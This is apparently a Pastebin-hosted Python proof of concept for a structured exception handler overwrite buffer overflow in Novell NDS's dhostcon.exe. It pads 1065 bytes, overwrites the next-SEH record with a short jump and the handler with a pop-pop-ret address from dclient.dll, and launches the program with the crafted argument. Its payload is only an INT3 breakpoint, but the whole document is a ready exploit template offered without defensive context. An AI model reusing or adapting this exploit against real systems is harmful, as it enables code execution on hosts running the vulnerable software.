document.write('
Data hosted with ♥ by Pastebin.com - Download Raw - See Original
  1. #!/usr/bin/python
  2. import os,struct
  3.  
  4. def main():
  5.     path="C:\\Novell\\NDS\\dhostcon.exe"  
  6.     args="x.x.x.x"              #ip server
  7.     buf="A"*1065
  8.     shellcode=struct.pack("<B",0xCC)    #INT3
  9.     nseh=struct.pack("<L",0x90909eeb)   #jmp short 0012ff50 +NOP + NOP
  10.     seh=struct.pack("<L",0x61012c20)    #PPR dclient.dll
  11.    
  12.     crash=buf+shellcode+nseh+seh
  13.  
  14.     os.system(path+" "+args+" "+crash)  #Crash!
  15.  
  16. if __name__=="__main__":
  17.     main()
');